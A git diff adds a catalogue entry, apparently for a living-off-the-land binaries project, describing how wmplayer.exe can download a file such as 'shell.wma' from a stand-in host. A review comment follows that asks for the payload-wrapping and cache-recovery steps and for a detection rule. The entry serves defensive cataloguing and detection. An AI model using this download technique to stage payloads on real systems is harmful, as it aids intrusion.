diff --git a/yml/OSBinaries/Wmplayer.yml b/yml/OSBinaries/Wmplayer.yml new file mode 100644 index 00000000..1ea67d5b --- /dev/null +++ b/yml/OSBinaries/Wmplayer.yml @@ -0,0 +1,27 @@ +--- +Name: Wmplayer.exe +Description: Windows Media Player +Author: 'Rutger Flohil' +Created: 2024-12-14 +Commands: + - Command: wmplayer.exe "http://example.com/shell.wma" + Description: Windows Media Player will download the file and attempt to play it. File should be encoded and have a compatible extension like wma. Download is stored in INetCache and needs to be cleaned before use. + Usecase: Download file from the internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 + Tags: + - Download: INetCache +Full_Path: + - Path: C:\Program Files\Windows Media Player\wmplayer.exe + - Path: C:\Program Files (x86)\Windows Media Player\wmplayer.exe +Code_Sample: + - Code: https://pampuna.nl/blog/2024/12/wmplayer.html +Detection: + - IOC: Network connections originating from wmplayer.exe may be suspicious +Resources: + - Link: https://pampuna.nl/blog/2024/12/wmplayer.html +Acknowledgement: + - Person: Rutger Flohil + Handle: ''
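Review bot: the Description's "File should be encoded and have a compatible extension like wma" and "Download is stored in INetCache and needs to be cleaned before use" do not say what encoding or cleaning is required, so a reader cannot reproduce the command from the entry alone; state the concrete step (how the payload is wrapped so wmplayer.exe accepts it as a .wma, and how the cached copy under INetCache is located and restored) in the Description rather than leaving it to the linked blog post. Code_Sample and Resources both point to the same URL (https://pampuna.nl/blog/2024/12/wmplayer.html); Code_Sample is for an actual sample, so either link the script the post provides or drop the Code_Sample block and keep the write-up under Resources. The Detection section carries only a generic IOC ("Network connections originating from wmplayer.exe may be suspicious"); a Sigma rule keyed on wmplayer.exe with a URL on its command line, or on wmplayer.exe writing to INetCache, would give defenders something they can deploy. The Acknowledgement Handle is an empty string (Handle: ''); fill it in or remove the key.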